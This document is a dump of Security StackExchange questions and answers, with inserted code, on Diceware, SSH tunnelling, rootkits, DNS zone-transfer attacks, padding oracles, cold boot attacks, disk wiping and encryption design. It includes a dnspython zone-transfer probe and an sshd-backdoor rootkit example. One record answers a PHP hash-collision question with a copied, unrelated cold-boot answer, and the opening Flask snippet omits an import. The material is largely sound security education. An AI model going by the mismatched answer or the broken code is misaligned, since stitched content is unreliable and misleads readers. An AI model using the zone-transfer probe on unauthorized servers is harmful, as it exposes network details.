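from flask import Flask, abort, jsonify, request, session

app = Flask(__name__)
app.secret_key = secrets.token_bytes(32)

@app.before_request
def reject_forgeable_requests():
    if request.method == "POST":
        # Plain <form> posts and cross-origin text/plain requests are refused outright.
        if request.mimetype != "application/json":
            abort(415)
        # Belt and braces: a token an attacker's page cannot read.
        expected = session.get("csrf_token")
        presented = request.headers.get("X-CSRF-Token", "")
        if not expected or not secrets.compare_digest(presented, expected):
            abort(403)

@app.route("/transfer", methods=["POST"])
def transfer():
    data = request.get_json()
    return jsonify(status="ok", amount=data.get("amount"))
```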
10,294 | Everyone knows the words used in Diceware passwords (all 6^5 = 7776 words are published ) -- they're all common words.
Everyone seems to know that we're not supposed to use dictionary words for passwords because the "dictionary attack" can rapidly guess a single dictionary word.
So it seems reasonable to leap to the conclusion that
a dictionary attack can also guess a Diceware passphrase pretty quickly. Can a dictionary attack mounted now (2012) crack a Diceware passphrase before 2033? In particular, is the claim on the Diceware page "A seven word pass phrase is thought to make attacks on your passphrase infeasible through 2033." accurate? Is that still true even if the attacker knows that I always use Diceware passphrases, and knows which language I use? How does a five-word Diceware passphrase compare to the common recommendation of 9 "completely random-looking gibberish" characters? (I'm asking a very specific question about the recommendations on the Diceware page, since related questions passphrases - lowercase and dictionary words and XKCD #936: Short complex password, or long dictionary passphrase? seem to get sidetracked onto things that are not really Diceware passphrases). | 5 Diceware words = 7776^5 = 28430288029929701376 possible equiprobable passphrases. 9 random characters = 94^9 = 572994802228616704 possible equiprobable passwords. The 5 Diceware words are 49.617 times better than the 9 random characters. On the other hand, 10 random characters would be almost twice as good as the 5 Diceware words (but the Diceware words are probably much easier to remember). (I assume that your "gibberish characters" are ASCII printable characters, excluding space.) With seven words, the number of possible and equiprobable passphrases is a bit higher than 2^90, which is indeed quite high; even if the employed password hashing scheme has been horribly botched (no salt, simple hashing), this still exceeds by a comfortable margin what can be done with today's technology. The important word is equiprobable . This is what makes the analysis above possible and accurate. This assumes that both your Diceware words, and the 9 "random-looking gibberish characters", are chosen with a truly random uniform process, such as, for instance, dice. And not at all by a human being in the privacy of his brain, imagining that he can make random choices out of pure thought (or, even worse, witty non-random choices). Humans are just terrible at randomness. | {
"source": [
"https://security.stackexchange.com/questions/10294",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1571/"
]
} |
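The arithmetic in the answer above, as a worked example in Python (entropy expressed in bits):

```python
from math import log2

diceware_5 = 7776 ** 5        # five words from a 7776-word list
diceware_7 = 7776 ** 7        # the seven-word phrase discussed on the Diceware page
gibberish_9 = 94 ** 9         # nine printable ASCII characters, space excluded
gibberish_10 = 94 ** 10

print(diceware_5, log2(diceware_5))      # ~2.8e19 combinations, ~64.6 bits
print(gibberish_9, log2(gibberish_9))    # ~5.7e17 combinations, ~59.0 bits
print(diceware_5 / gibberish_9)          # ~49.6: the factor quoted in the answer
print(gibberish_10 / diceware_5)         # ~1.9: ten characters beat five words
print(log2(diceware_7))                  # ~90.5 bits, "a bit higher than 2^90"
```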
10,340 | Unfortunately our government filters the SSH protocol so now we can't connect to our Linux server. They do the filtering by checking the header of each packet in the network layer (and not by just closing port). They also do away with VPN protocols. Is there any alternative way to securely connect to a Linux server? | From what I heard earlier today, https/ssl flows correctly through your borders. You should hence check out Corkscrew . Similarly to netcat , it's used to wrap ssh in https to allow the use of https proxies. Another solution would be to use LSH which, by having a different signature than ssh, works from Iran as Siavash noted it in his message . | {
"source": [
"https://security.stackexchange.com/questions/10340",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6740/"
]
} |
10,369 | As a followup to " Tripwire - Is It Security Theater ", I'm looking to get a better idea of what a rootkit is. To be more clear: What is a kernel module? What at high-level is the flow for how it's loaded, and why/what memory is of value? Do linux kernels receive patches or have other defenses that prevent rootkits from being installed by someone who has already acquired root permissions (at least on live systems by a remote user)? Meaning: what inputs/outputs creates value that requires ring-0 access to rootland? If it's not clear, I'm not looking to root a system, or advice on how to do so, but I am interested in how someone that's familiar with rootkits would define the how and why of their nature. If limiting the topic to Linux is of use, that's fine to me. | A rootkit is a set of tools that you run on a target machine when you somehow gained access to it with root-level privileges. The point of the rootkit is to transform that transient access into an always-open door. An example of a rootkit would be a modification of the sshd binary, so that it always accepts " 8gh347vb45 " as password for root , regardless of what the "normal" password for root is. It allows the attacker to come back later on, without having to go again through the hoops of the exploit he used first. The first task of a rootkit is to hide itself, and to resists upgrades. If the rootkit merely modifies sshd (that's an example), the next upgrade of the openssh package will remove the rootkit. A more resistant rootkit would alter the package manager as well, so that when openssh is upgraded, the new sshd gets automatically modified so that the extra access point for the attacker is kept open. The most powerful rootkits modify the kernel , which is the piece of software which actually manages the hardware. All process (for all users, including root), when they access data or hardware resources (e.g. reading or writing files), do so by asking nicely the kernel. A rootkit installed in the kernel can hide files quite effectively, and can reinstall itself upon every upgrade of the kernel, since such an upgrade would be the replacement of the file containing the kernel code with another one -- i.e. an operation which necessarily goes through the kernel. A kernel module is a piece of code which is dynamically loaded into the kernel. In Linux, up to some point in the 1.3.x series, was a single monolithic block of code which was loaded in RAM by the bootloader in one go. Modules are chunks of code which can be added at a later point to the live kernel; their point was initially to allow the kernel to potentially handle hundreds of kinds of hardware without having to contain the corresponding driver code in RAM at all times. The idea is that when a new piece of hardware is detected on the machine, the corresponding code is loaded and linked to the kernel, as if it had been there from the very beginning. The root user has the power to ask for a module to be loaded. So this is a way for some code with root privileges to get some arbitrary code inserted into the kernel itself, and running with the powers granted to the kernel, i.e. mastery over all hardware and processes (so-called 'ring 0' in the x86 world). This is exactly what a kernel rootkit needs. Edit: as for the third question (can you patch against rookits), the generic answer is no (by construction, on a Unix system, root can do everything on a machine), but the specific answer can be yes . 
For instance, there are security frameworks which add constraints to what most root processes can do (e.g. SELinux ), and can disallow kernel module loading. This means that the envisioned temporary root access by the attacker is not a true root access, only an "almost-root". Another possible feature is signed modules (the kernel would refuse modules which have not been cryptographically signed, so the rootkit would have to locate and use the private key before installing its own module, something which may not be possible if that key is not stored on the machine itself)(I am not sure whether signed module support is currently integrated in the Linux kernel). Also, modules must link with the kernel code, making them quite sensitive to variations between kernel versions -- so even in the absence of any actual countermeasure, it is difficult for a rootkit to reliably reinfect newer kernels upon upgrades. | {
"source": [
"https://security.stackexchange.com/questions/10369",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2742/"
]
} |
10,438 | Is that called a 'round' every time you move your mouse when creating a new volume? I'm talking about the screen with the random numbers during the volume creation process. What is the purpose of doing the random movement? I saw Lastpass is now doing '100,000 rounds', I'm not sure what that means exactly. Brand new to the world of encryption here :) | You are creating something called "entropy". Random number generators within computers can, if implemented within software, only be at best pseudo-random. Pseudo-random number generators (PRNG) start with a seed. If the seed is well-known, then anyone with knowledge of the PRNG algorithm can derive the same values you derived (this is actually really good for things like simulations and the like where you need an element of reproducability -- it is not good for crypto). So you need to start with a non-well-known seed. Traditionally (not for crypto!) this seed was the computer's time of day. However, for crypto, you need much stronger randomness than this. In many commercial environments, there is often the requirement that random number generators (RNGs) are based off of a hardware-based "noise source". This could be things like random network packet data, the number of photons hitting a detector, the speed of air across a sensor, or any combination of things that might be considered TRULY random. Unfortunately, these hardware-based noise sources don't usually find themselves in widespread use in consumer environments. So the next best thing is to pull hardware-based noise from something else. Many encryption systems use a human moving a mouse to acquire this. Even if the human moves the mouse in circles or back and forth, there is usually still enough actual real-world randomness in the mouse path deviation to provide a reasonable level of entropy to seed the PRNG. For real-world examples of entropy from the environment, look no further than the air-splayed balls spinning around in a lottery cage. "Rounds" are not related to entropy gathering and are related to the number of times that a specific algorithm is run through. There is almost always (?) a feedback mechanism allowing one round to affect later rounds. Increasing the number of rounds increases the amount of time it takes to encrypt/decrypt data. This is important as it can seriously de-scale any brute force decryption efforts. Of course, it also slows down the ENCRYPTION efforts as well. | {
"source": [
"https://security.stackexchange.com/questions/10438",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6366/"
]
} |
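The "100,000 rounds" figure in the question refers to key-stretching iterations of this kind, not to the mouse-movement entropy gathering. A sketch with Python's standard-library PBKDF2; the parameter values are illustrative and LastPass's actual implementation may differ.

```python
import hashlib
import os
import time

password = b"correct horse battery staple"
salt = os.urandom(16)                    # random salt, stored alongside the derived key

start = time.perf_counter()
key = hashlib.pbkdf2_hmac("sha256", password, salt, 100_000, dklen=32)
elapsed = time.perf_counter() - start

print(key.hex())
print(f"one derivation took {elapsed:.3f}s")   # an attacker pays the same cost per guess
```

Raising the iteration count slows down every brute-force guess by the same factor it slows down your own login, which is exactly the trade-off the answer describes.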
10,452 | Can anyone explain what a DNS zone transfer attack is, or give any link or paper? I have already googled, but could not find anything meaningful. | DNS zone transfer is the process where a DNS server passes a copy of part of its database (which is called a "zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about a particular zone; there is a Primary DNS server, and one or more Secondary DNS servers, and the secondaries ask the primary for a copy of the records for that zone. A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a secondary and ask the primary for a copy of the zone records. And it sends them to you; DNS is one of those really old-school Internet protocols that was designed when everyone on the Internet literally knew everyone else's name and address , and so servers trusted each other implicitly. It's worth stopping zone transfer attacks, as a copy of your DNS zone may reveal a lot of topological information about your internal network. In particular, if someone plans to subvert your DNS, by poisoning or spoofing it, for example, they'll find having a copy of the real data very useful. So best practice is to restrict zone transfers. At the bare minimum, you tell the primary what the IP addresses of the secondaries are and not to transfer to anyone else. In more sophisticated set-ups, you sign the transfers. So the more sophisticated zone transfer attacks try to get round these controls. SANS have a white paper that discusses this further. | {
"source": [
"https://security.stackexchange.com/questions/10452",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
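What "pretending to be a secondary" looks like in practice, sketched with the dnspython package (assumed installed). The server and zone names are placeholders; only run this against zones you are authorized to test, and note that a correctly restricted primary will simply refuse the transfer.

```python
import dns.query
import dns.zone

NAMESERVER = "ns1.example.com"   # hypothetical primary name server
ZONE = "example.com"             # hypothetical zone

try:
    zone = dns.zone.from_xfr(dns.query.xfr(NAMESERVER, ZONE, timeout=10))
    for name, node in sorted(zone.nodes.items()):
        print(name, node.to_text(name))     # every record the primary handed over
except Exception as exc:
    print(f"zone transfer refused or failed: {exc}")
```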
10,464 | Lots of different programs, such as Darik's Boot and Nuke , let you write over a hard drive multiple times under the guise of it being more secure than just doing it once. Why? | Summary: it was marginally better on older drives, but doesn't matter now. Multiple passes erase a tree with overkill but miss the rest of the forest. Use encryption. The origin lies in work by Peter Gutmann, who showed that there is some memory in a disk bit: a zero that's been overwritten with a zero can be distinguished from a one that's been overwritten with a zero, with a probability higher than 1/2. However, Gutmann's work has been somewhat overhyped, and does not extend to modern disks. “The urban legend of multipass hard disk overwrite and DoD 5220-22-M” by Brian Smithson has a good overview of the topic. The article that started it is “Secure Deletion of Data from Magnetic and Solid-State Memory” by Peter Gutmann , presented at USENIX in 1996. He measured data remanence after repeated wipes, and saw that after 31 passes, he was unable (with expensive equipment) to distinguish a multiply-overwritten one from a multiply-overwritten zero. Hence he proposed a 35-pass wipe as an overkill measure. Note that this attack assumes an attacker with physical access to the disk and somewhat expensive equipment. It is rather unrealistic to assume that an attacker with such means will choose this method of attack rather than, say, lead pipe cryptography . Gutmann's findings do not extend to modern disk technologies, which pack data more and more. “Overwriting Hard Drive Data: The Great Wiping Controversy” by Craig Wright, Dave Kleiman and Shyaam Sundhar is a recent article on the topic; they were unable to replicate Gutmann's recovery with recent drives. They also note that the probability of recovering successive bits does not have a strong correlation, meaning that an attacker is very unlikely to recover, say, a full secret key or even a byte. Overwriting with zeroes is slightly less destructive than overwriting with random data, but even a single pass with zeroes makes the probability of any useful recovery very low. Gutmann somewhat contests the article ; however, he agrees with the conclusion that his recovery techniques are not applicable to modern disks: Any modern drive will most likely be a hopeless task, what with ultra-high densities and use of perpendicular recording I don't see how MFM would even get a usable image, and then the use of EPRML will mean that even if you could magically transfer some sort of image into a file, the ability to decode that to recover the original data would be quite challenging. Gutmann later studied flash technologies , which show more remanence. If you're worried about an attacker with physical possession of the disk and expensive equipment, the quality of the overwrite is not what you should worry about. Disks reallocate sectors: if a sector is detected as defective, then the disk will not make it accessible to software ever again, but the data that was stored there may be recovered by the attacker. This phenomenon is worse on SSD due to their wear leveling. Some storage media have a secure erase command (ATA Secure Erase). UCSD CMRR provides a DOS utility to perform this command ; under Linux you can use hdparm --security-erase . 
Note that this command may not have gone through extensive testing, and you will not be able to perform it if the disk died because of fried electronics, a failed motor, or crashed heads (unless you repair the damage, which would cost more than a new disk). If you're concerned about an attacker getting hold of the disk, don't put any confidential data on it. Or if you do, encrypt it. Encryption is cheap and reliable (well, as reliable as your password choice and system integrity). | {
"source": [
"https://security.stackexchange.com/questions/10464",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6813/"
]
} |
10,529 | So, since Android 3, devices can perform boot-time, on-the-fly encryption/decryption of the application storage area ( NOT the SDcard/removable storage) - essentially full-disk encryption. This requires a password/passphrase/PIN to be set as the screen unlock code and decryption key, unlock patterns cannot be used. I have a suspicion that there is actually no benefit to enabling encryption, mainly because the memory chips that serve as the "hard drive" can't be easily removed like real hard drives in computers. I'm wondering if others can comment on my reasoning. Scenario 1 : Device is lost, or stolen by an opportunistic thief (i.e. unsophisticated) With encryption -> Finder/thief can't gain access With no encryption but with screen lock -> Finder/thief can't gain access Scenario 2 : Device is stolen by a sophisticated attacker, but they must leave no trace of the attack (therefore chip-off methods are excluded and the phone must be returned before the loss is discovered) With encryption -> Finder/thief can't gain access With no encryption but with screen lock -> Finder/thief can't gain access Scenario 3 : Device is stolen by a determined attacker, and the owner made to reveal the passcode under duress. Android doesn't have Truecrypts plausible deniability features. With encryption -> Attacker gains access With no encryption but with screen lock -> Attacker gains access Are there any scenarios I've missed? So my conclusion is that there is no point to enabling full device encryption on Android - a screen lock will do. Discuss! (I am quite happy to be proven wrong, I just can't see how there is a benefit to it) | The advantages are limited, but there are nonetheless scenarios where encryption helps. In any scenario where the attacker obtains the password¹ (with lead pipe cryptography , or far more realistically by reading the unlock pattern on the screen or brute force on the PIN), there is clearly no advantage to full disk encryption. So how could the attacker obtain the data without obtaining the password? The attacker might use a software vulnerability to bypass the login screen. A buffer overflow in adbd , say. The attacker may be able to access the built-in flash memory without booting the device. Perhaps through a software attack (can the device be tricked into booting from the SD card? Is a debug port left open?); perhaps through a hardware attack (you postulate a thief with a lead pipe, I postulate a thief with a soldering iron). Another use case for full-disk encryption is when the attacker does not have the password yet. The password serves to unlock a unique key which can't be brute-forced. If the thief unwittingly lets the device connect to the network before unlocking it, and you have noticed the theft, you may be able to trigger a fast remote wipe — just wipe the key, no need to wipe the whole device. (I know this feature exists on recent iPhones and Blackberries; presumably it also exists or will soon exist on Android devices with full-disk encryption.) If you're paranoid, you might even trigger a key wipe after too many authencation failures. If that was you fumbling, you'd just restore the key from backup (you back up your key, right? That's availability 101). But the thief is a lot less likely to have access to your backup than to your phone. ¹ Password, passphrase, PIN, passgesture, whatever. | {
"source": [
"https://security.stackexchange.com/questions/10529",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1811/"
]
} |
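A footnote on the "wipe the key, not the device" point in the answer above: full-disk encryption schemes generally encrypt the partition under a random master key and store only a small wrapped copy of that key, protected by a key derived from the unlock passcode. The following PHP sketch illustrates the construction only; it is not Android's actual implementation, and every name and parameter in it is illustrative.

$passcode  = '4321';                       // the user's unlock PIN/passphrase
$salt      = random_bytes(16);
$kek       = hash_pbkdf2('sha256', $passcode, $salt, 100000, 32, true);   // key-encryption key
$masterKey = random_bytes(32);             // the key the partition is actually encrypted under
$iv        = random_bytes(12);
$wrapped   = openssl_encrypt($masterKey, 'aes-256-gcm', $kek, OPENSSL_RAW_DATA, $iv, $tag);
// Unlocking re-derives the KEK from the passcode and unwraps the master key:
$unwrapped = openssl_decrypt($wrapped, 'aes-256-gcm', $kek, OPENSSL_RAW_DATA, $iv, $tag);
// A "fast remote wipe" only needs to destroy $salt and $wrapped (a few dozen bytes);
// without the master key, the whole encrypted partition becomes unreadable at once.

This is also why the key can be restored from a backup of that small blob, as the answer notes, while the bulk data never has to be touched.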
10,538 | I'm working on a web site with a several levels of subdomains. I need to secure all of them with SSL, and I'm trying to determine the correct certificate strategy. Here's what I need to secure: foo.com www.foo.com Any combination of city.state.foo.com. (These are US states.) My understanding is that a wildcard certificate can only cover one "level" of subdomain. According to RFC 2818 : Names may contain the wildcard character * which is considered to
match any single domain name component or component fragment. E.g.,
*.a.com matches foo.a.com but not bar.foo.a.com.
f*.com matches foo.com but not bar.com. What I think I need is the following certificates: *.foo.com, which will match, for example, foo.com and www.foo.com. (Though I'm not clear on whether *.a.com matches a.com by itself.) *.ny.foo.com to match new-york.ny.foo.com, buffalo.ny.foo.com, etc. I will eventually need 50 such certificates to match all the states, once our site expands to serve them all. My questions are: Is this scheme correct? In the scenario above, if a user visits ca.foo.com, will they get the certificate for *.foo.com or for *.ca.foo.com? How can I ensure that users see all of these subdomains as legitimately owned by us? For example, if a user visits foo.com, then mountain-view.ca.foo.com, and those are different certificates, will they get a warning? Is there some way to assure their browser that these certificates share the same owner? | Theoretically: a * matches exactly one level (hence *.foo.com does not match foo.com), and you can have several * in a name. Hence, if all SSL implementations faithfully follow RFC 2818, you just need three certificates, with names: foo.com *.foo.com *.*.foo.com and, if the implementations are really good at sticking with RFC 2818 and the intricacies of X.509, you could even use a single certificate which lists the three strings above in its Subject Alt Name extension. Now, theory and practice perfectly match... in theory. You may have surprises with what browsers actually do. I suggest you try it out; some example certificates can be created with the OpenSSL command-line tool (see for instance this page for a few guidelines). An example invocation is sketched after this entry. | {
"source": [
"https://security.stackexchange.com/questions/10538",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4596/"
]
} |
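A practical way to test the multi-wildcard question above before spending money: generate a self-signed certificate that carries all three names in its Subject Alt Name extension and see how each browser reacts. One possible invocation, assuming OpenSSL 1.1.1 or newer (older releases lack -addext and need a config file instead):

openssl req -x509 -newkey rsa:2048 -nodes -days 365 \
  -keyout test-key.pem -out test-cert.pem \
  -subj "/CN=foo.com" \
  -addext "subjectAltName=DNS:foo.com,DNS:*.foo.com,DNS:*.*.foo.com"

Serve a throwaway site with it and visit ca.foo.com and mountain-view.ca.foo.com in the browsers you care about; in practice many clients refuse the *.*.foo.com form, which is exactly the kind of surprise the answer warns about.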
10,617 | I came across the term "cryptographic oracle" and despite a bit of googling I was unable to come across a clear, concise definition. What is a cryptographic oracle and what does it do? Can anyone give an example? | An oracle is an individual who knows the personal cell phone number of a god. This enables him (or her) to obtain some information which is usually considered as out of reach of mere mortals, such as glimpses of the future. In cryptography, that's the same, except that no deity is involved: an oracle is any system which can give some extra information on a system, which otherwise would not be available. For instance, consider asymmetric encryption with RSA . The standard I link to states how a piece of data should be encrypted with a public key. In particular, the encryption begins with a padding operation, in which the piece of data is first expanded by adding a header, so that the padded data length matches the RSA public key length. The header should begin with the two bytes 0x00 0x02 , followed by at least eight random non-zero bytes, and then another 0x00 . Once the data has been padded, it is time to apply the mathematical operation which is at the core of the RSA operation (modular exponentiation). Details of the padding are important for security. The encryption result is an integer modulo the RSA modulus , a big integer which is part of the public key. For a 1024-bit RSA key, the modulus n is an integer value greater than 2 1023 , but smaller than 2 1024 . A properly encrypted data chunk, with RSA, yields an integer value between 1 and n-1 . However, the padding implies some structure , as shown above. The decrypting party MUST find, upon decryption, a properly formed PKCS#1 header, beginning with the 0x00 0x02 bytes, followed by at least eight non-zero bytes, and there must be a 0x00 which marks the end of the header. Therefore, not all integers between 1 and n-1 are valid RSA-encrypted message (less than 1 every 65000 such integers would yield a proper padding upon decryption). Knowing whether a given integer modulo n would yield, upon decryption, a valid padding structure, is supposed to be infeasible for whoever does not know the private key. The private key owner (the deity) obtains that information, and much more: if the decryption works, the private key owner actually gets the message, which is the point of decryption. Assume that there is an entity, somewhere, who can tell you whether a given integer modulo n is a validly encrypted piece of data with RSA; that entity would not give you the full decryption result, it would just tell you whether decryption would work or not. That's a one-bit information, a reduced glimpse of what the deity would obtain. The entity is your oracle: it returns parts of the information what is normally available only to the private key owner. It turns out that, given access to such an oracle, it is possible to rebuild the private key, by sending specially crafted integers modulo n (it takes a million or so of such values, and quite a bit of mathematics, but it can be done). 
It also turns out that most SSL/TLS implementations of that time (that was in 1999) were involuntarily acting as oracles: if you sent, as a client, an invalidly RSA-encrypted ClientKeyExchange message, the server was responding with a specific error message ("duh, your ClientKeyExchange message stinks"), whereas if decryption worked, the server was keeping on with the protocol, using whatever value it decrypted (usually unknown to the client if the client sent a random value, so the protocol failed later on, but the client could see the difference between a valid and an invalid padding). Therefore, with such an implementation, an attacker could (after a million or so failed connections) rebuild the server's private key, which is usually considered to be a bad thing. That's what oracles are: a mathematical description of a data leak, to be used in security proofs. In the case of RSA, this demonstrates that knowing whether a value has a proper padding or not is somehow equivalent to learning the private key (if you know the private key you can attempt the decryption and see the padding for yourself; the Bleichenbacher attack shows that it also works the other way round). The padding check at the heart of this oracle is sketched after this entry. | {
"source": [
"https://security.stackexchange.com/questions/10617",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1801/"
]
} |
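The "one bit of information" in the RSA example above is simply the outcome of the PKCS#1 v1.5 padding check. A rough PHP sketch of that check (illustrative only, not complete and not constant-time; $m is assumed to be the raw result of the RSA private-key operation, left-padded to the modulus length):

function has_valid_pkcs1_v15_padding(string $m): bool {
    if (strlen($m) < 11) return false;
    if ($m[0] !== "\x00" || $m[1] !== "\x02") return false;  // required 0x00 0x02 header
    $zero = strpos($m, "\x00", 2);                           // the 0x00 that ends the padding
    if ($zero === false) return false;
    return ($zero - 2) >= 8;                                 // at least 8 non-zero padding bytes
}

A server that lets an outsider observe this boolean, through a distinct error message or even a timing difference, is handing out exactly the oracle that the Bleichenbacher attack consumes.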
10,643 | I've heard that if your PC is turned off, then an attacker can recover the RAM from the last session. I find this hard to believe. How could it be done? | There is an element of truth to this one - an attack was discovered which took advantage of data remanence in RAM, allowing an attacker to grab data from the RAM in a machine. There was a very short timeframe (a matter of seconds or minutes) in which to do this, but it wasn't a hack of the PC as such. Simple Wikipedia link to Cold Boot Attack here And the McGrew link here giving more detail | {
"source": [
"https://security.stackexchange.com/questions/10643",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6731/"
]
} |
10,646 | A new version of PHP, 5.3.9, was released a couple of days ago with a fix for the hash-collision issue, but most servers haven't upgraded yet, including my website's server. In this article I came across a passage saying that sites on shared hosting can't upgrade PHP on their own. I know that, but I'm wondering: isn't it possible to use ini_set to set max_input_vars and secure your site (not the server)? I know that if someone attacks the server the whole site will be down, but by setting max_input_vars at least my site will be safe if somebody attacks it directly. Is this correct? | There is an element of truth to this one - an attack was discovered which took advantage of data remanence in RAM, allowing an attacker to grab data from the RAM in a machine. There was a very short timeframe (a matter of seconds or minutes) in which to do this, but it wasn't a hack of the PC as such. Simple Wikipedia link to Cold Boot Attack here And the McGrew link here giving more detail | {
"source": [
"https://security.stackexchange.com/questions/10646",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6142/"
]
} |
10,872 | I often see passphrase suggestions written as a sentence, with spaces. In that format are they more susceptible to a dictionary attack because each word is on its own as opposed to a large unbroken 20+ character 'blob'? | No (with a minor exception at the bottom). The passphrases "correct horse battery staple" and "correcthorsebatterystaple" are equivalent entropy-wise. Choosing to put spaces in an incorrect spot or sometimes including spaces and sometimes not including spaces will give you a few extra bits of entropy, but it's not worth it for the extra difficulty remembering it. You'd gain a few bits of entropy for the entire passphrase for a weird spacing pattern, while just adding another word would add about 13 bits (assuming a diceware dictionary of 7776 words corresponding to 5 rolls of a six-sided die; note that lg(6^5) = 12.92, lg being the base-2 logarithm). (There's no disagreement between my answer and Thomas's; an attacker would have to check for passphrases both with and without spaces unless he had extra information about whether you tended to use spaces in your passphrases.) Beware the distinction between random words and meaningful sentences. A passphrase like "quantum mechanics is strange" has much lower entropy than, say, "heat fudge scott canopy". Why? In meaningful English you have patterns: certain words combine frequently (quantum mechanics), and certain patterns must appear to be grammatically correct (subject, predicate, subject complement), which in principle could be exploited by a sufficiently sophisticated attacker (even though I am not aware of any cracking algorithms that currently utilize this). The informational entropy of grammatically correct written English is about 1 bit per character, so the first passphrase has ~30 bits [1], while the second passphrase has about 4×12.9 ≅ 52 bits of entropy; so it would take about 2^22 ≅ 4 million times longer to crack. Be wary of incorrect analyses like http://www.baekdal.com/insights/password-security-usability that make many fundamental information theory mistakes. E.g., "this is fun" is incredibly weak, being comprised of some of the most common English words in a syntactically correct sentence that is very common ('this' ~ 23rd most common; 'is' ~ 7th most common; 'fun' ~ 856th most common word) [2]. If you tested just three random words from the top 1000 English words, it would take you only 1 second to crack it, assuming a modern GPU and that you have acquired the (salted) hash. This is roughly equivalent to 5 random alphanumeric characters (not counting special symbols). If you search Google for the quoted phrase "this is fun" it appears 228 million times. EDIT: Minor exception: in the rare case when consecutive words in your passphrase form another word in your dictionary (or your attacker's dictionary), then not having spaces (or another separator) between words lowers your passphrase's entropy significantly. For example, if the random words forming your passphrase were "book case the rapist" and you had no spaces, an attacker could get in by trying all combinations of just two words, 'bookcase therapist'. | {
"source": [
"https://security.stackexchange.com/questions/10872",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6366/"
]
} |
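The arithmetic behind the figures in the answer above is easy to reproduce; here is a small PHP sketch using the same assumptions (a 7776-word diceware list, and roughly 1 bit of entropy per character of meaningful English):

$perWord = log(7776, 2);                 // ≈ 12.9 bits per random diceware word
echo round(4 * $perWord, 1), "\n";       // 4 random words ≈ 51.7 bits
echo round(6 * $perWord, 1), "\n";       // 6 random words ≈ 77.5 bits
// A ~30-character grammatical English sentence is only about 30 bits,
// so the gap of ~22 bits means roughly 2^22 ≈ 4 million times more work to crack.

Adding or removing spaces changes none of these numbers, which is the core of the answer.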
10,949 | My model is one where I have several clients which wish to speak with some (but not all) of the other clients. All messages will be sent through a server. Only the two clients communicating with each other should be able to know the message. So the server AND the other clients should not be able to work out what message was sent. Communication between two clients may start and end several times a day. Messages will be plaintext with potentially unlimited length, but likely to be much less, think SMS style messages. Given these circumstances, how should I encrypt the messages? I don't mind writing extra code if it leads to better speed or efficiency. I know the rough basics of how RSA and AES work but I can't figure out what is best. When you generate a public/private key pair for RSA, is there any situation where you would need to generate a new pair? Or can one client have one public key and give the same key to anyone that wants to talk to him and only him be able to (ever) read the messages, but they store the public key for all future messages? Or should I have a separate symmetric AES key for pair of clients and simply share that when contact is first initiated and use that forever. Again, is there any circumstance where this would need to be generated again? How would I store the key(s) so they persist if client crashes/shutsdown/reboots? | Neither, unless it's both. You're asking the wrong question . You should not be thinking about a cryptographic algorithm at this stage, but about a cryptographic protocol. Cryptographic protocols are hard to design, and a frequent source of security bugs. You don't fully understand public-key cryptography, so you aren't ready to use it in your own cryptographic protocol. At a high level, your model is amenable to public-key cryptography (e.g. RSA). Let every client have its own private key and publish its public key to the other client. A client's private key does not change over time, unless the client has been compromised. Symmetric cryptography (e.g. AES) would not scale well here because each pair of clients would need to have its own secret key. Use existing software whenever possible. Implementing cryptographic protocols is almost as tricky as designing them. For a model where clients occasionally send messages to one another, email-style, a tool that would work well is GnuPG . (For bidirectional communications, use SSL/TLS .) So: for day-to-day operation, to send a message, call gpg , encrypt with the public key of the recipient, and while you're at it sign with the private key of the sender. When receiving a message, check the signature against the purported sender's public key, and decrypt with the private key of the receiver. In other words, send with gpg --sign --encrypt -r NAME_OF_RECIPIENT and receive with gpg --verify followed by gpg --decrypt . The remaining problem is that of key distribution. After a client has generated its key pair, it needs to inform the other clients about it and distribute it without allowing the public key to be intercepted and replaced in transit by an attacker. How to do this depends a lot of your precise scenario. Don't neglect the security of this part. If, and only if, invoking GnuPG proves to be too slow, then consider using a lighter-weight, perhaps home-made implementation of a similar protocol (going from e-mail range overhead to SMS range overhead). 
Under the hood, GnuPG generates a symmetric key for each message, because public-key cryptography is expensive for large messages; the public key algorithm is only used to encrypt the symmetric key and to sign a digest of the file. You should follow this model. Using AES for symmetric encryption, SHA-256 as the digest algorithm and RSA as the public key algorithm is a good choice. | {
"source": [
"https://security.stackexchange.com/questions/10949",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/157440/"
]
} |
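The hybrid model described at the end of the answer (a fresh symmetric key per message, with the public-key algorithm used only to wrap that key and to sign) can be sketched with PHP's openssl extension. This is an illustration of the model, not a substitute for GnuPG: key loading, key distribution and error handling are all omitted, and the variable names are placeholders.

// Assumes $senderPriv/$senderPub and $recipPriv/$recipPub were loaded with
// openssl_pkey_get_private() / openssl_pkey_get_public().
$plaintext = 'the message to protect';

// Sender: encrypt under a one-off AES key, wrap the key for the recipient, sign.
$msgKey = random_bytes(32);
$iv     = random_bytes(12);
$cipher = openssl_encrypt($plaintext, 'aes-256-gcm', $msgKey, OPENSSL_RAW_DATA, $iv, $tag);
openssl_public_encrypt($msgKey, $wrappedKey, $recipPub, OPENSSL_PKCS1_OAEP_PADDING);
openssl_sign($iv . $tag . $cipher, $signature, $senderPriv, OPENSSL_ALGO_SHA256);
// transmit: $wrappedKey, $iv, $tag, $cipher, $signature

// Recipient: verify first, then unwrap the key and decrypt.
if (openssl_verify($iv . $tag . $cipher, $signature, $senderPub, OPENSSL_ALGO_SHA256) !== 1) {
    throw new RuntimeException('bad signature');
}
openssl_private_decrypt($wrappedKey, $msgKey, $recipPriv, OPENSSL_PKCS1_OAEP_PADDING);
$plain = openssl_decrypt($cipher, 'aes-256-gcm', $msgKey, OPENSSL_RAW_DATA, $iv, $tag);

As the answer stresses, getting these dozen lines right is the easy part; the protocol around them (key distribution, replay protection, identity binding) is where home-made designs usually fail.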
